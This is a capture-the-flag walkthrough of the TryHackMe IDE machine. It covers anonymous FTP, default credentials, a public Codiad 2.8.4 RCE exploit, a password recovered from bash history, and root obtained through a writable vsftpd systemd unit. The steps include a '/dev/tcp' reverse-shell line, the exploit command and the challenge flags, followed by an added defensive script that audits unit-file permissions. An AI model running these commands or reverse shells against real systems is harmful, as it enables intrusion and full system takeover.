TryHackMe – IDE Walkthrough

In this write-up, I will walk through my process of exploiting the TryHackMe IDE machine, gaining an initial foothold, escalating privileges, and ultimately capturing the root flag.

Enumeration

1. Scanning for Open Ports

I started with an Nmap scan to discover open services:

nmap -sC -sV -p- <TARGET_IP>

This revealed the following key findings:

  • FTP (Port 21) – Allowed anonymous login.
  • HTTP (Port 80) – Hosting a web application.
  • HTTP (Port 62337) – Hosting Codiad 2.8.4, a web-based IDE.

2. FTP Enumeration

Anonymous FTP access was enabled, allowing me to browse directories:

ftp 10.10.123.202

Running ls revealed a hidden directory ... with a text file containing:

Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.

This suggested that a user named John had a default password.

3. Exploiting Codiad (Authenticated RCE)

Navigating to port 62337 revealed Codiad 2.8.4, a known vulnerable IDE. Since the FTP note hinted at default credentials, I tried:

Username: john
Password: password

This successfully logged me into Codiad!

Exploiting Codiad 2.8.4 for RCE

Searchsploit confirmed that a public authenticated RCE exploit exists for this version:

searchsploit codiad 2.8.4

I used an authenticated RCE exploit:

python3 49705.py http://10.10.123.202:62337 john password <MY_IP> 4444 linux

This provided me with a reverse shell as www-data.

Privilege Escalation

1. Finding Credentials in .bash_history

Checking drac's home directory, I found MySQL credentials in .bash_history:

mysql -u drac -p 'Th3dRaCULa1sR3aL'

I attempted to SSH into the box using these credentials:

ssh drac@10.10.123.202

It worked, and I now had shell access as drac!

I grabbed the user.txt flag:

user.txt:02930d21a8eb009f6d26361b2d24a466

2. Abusing Writable vsftpd.service for Root Access

Running LinPEAS flagged /systemd/system/multi-user.target.wants/vsftpd.service as writable (RED alert – 95% PE chance). Listing its contents:

cat /systemd/system/multi-user.target.wants/vsftpd.service

The original configuration contained:

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf

Since this file was writable, I modified it to execute a reverse shell:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/home/drac/shell.sh
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

The entry under multi-user.target.wants is a symlink to the actual unit file:

/lib/systemd/system/vsftpd.service

3. Creating the Payload Script

I created /home/drac/shell.sh to spawn a root shell:

sh -i >& /dev/tcp/10.2.29.4/4444 0>&1
chmod +x /home/drac/shell.sh

4. Reloading Systemd and Restarting vsftpd

Since systemd has to reload its unit files before the change takes effect, I ran:

systemctl daemon-reload

Then restarted vsftpd:

sudo service vsftpd restart

5. Catching the Root Shell

On my Kali machine, I set up a listener:

nc -lvnp 4444

Within seconds, I had a root shell!
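The root cause here is a unit file that a low-privileged user can edit. The following audit helper is an added example, not part of the original write-up: it walks the systemd unit directories, follows the *.wants/ symlinks to the real files (as in the vsftpd case above), and reports any unit that is world-writable, group-writable by a non-root group, or not owned by root. It assumes Linux with GNU or busybox `stat -c`, `readlink -f` and `find -L`; UNIT_OWNER (default root) names the only account that should own unit files.

```shell
#!/bin/sh
# Added audit helper; not from the original write-up. Lists systemd unit files
# that someone other than the expected owner could modify, which is the
# misconfiguration LinPEAS flagged above (a writable ExecStart= means root).
# Assumes Linux with GNU/busybox stat, readlink and find.
UNIT_OWNER=${UNIT_OWNER:-root}

# Print one line per weak unit: "<reason> <mode> <owner>:<group> <path>".
# Arguments are directories to scan; with none, the standard unit directories.
audit_unit_files() {
    [ "$#" -gt 0 ] || set -- /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -L follows symlinks: entries in *.wants/ point at the real unit file,
        # and it is the target's permissions that decide who can edit ExecStart=.
        find -L "$dir" -type f \( -name '*.service' -o -name '*.timer' -o -name '*.socket' \) \
            -exec readlink -f {} \; 2>/dev/null
    done | sort -u | while IFS= read -r real; do
        info=$(stat -c '%a %U %G' "$real" 2>/dev/null) || continue
        set -- $info
        mode=$1 owner=$2 group=$3
        # Take the "other" and "group" octal digits by string slicing, so a
        # leading zero or a setuid digit (4755) cannot confuse shell arithmetic.
        other=${mode#"${mode%?}"}; rest=${mode%?}; grp=${rest#"${rest%?}"}
        reason=''
        case $other in 2|3|6|7) reason=world-writable ;; esac
        if [ -z "$reason" ] && [ "$group" != "$UNIT_OWNER" ]; then
            case $grp in 2|3|6|7) reason=group-writable ;; esac
        fi
        if [ -z "$reason" ] && [ "$owner" != "$UNIT_OWNER" ]; then
            reason="owner-not-$UNIT_OWNER"
        fi
        if [ -n "$reason" ]; then
            printf '%s %s %s:%s %s\n' "$reason" "$mode" "$owner" "$group" "$real"
        fi
    done
}
```

Run it as root on the box (`audit_unit_files`) to see every unit a non-root user could tamper with; an empty result is the expected state.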

Root Flag

cat /root/root.txt

root.txt:ce258cb16f47f1c66f0b0b77f4e0fb8d


💻 Follow my journey at TheWireshark.com! 🔥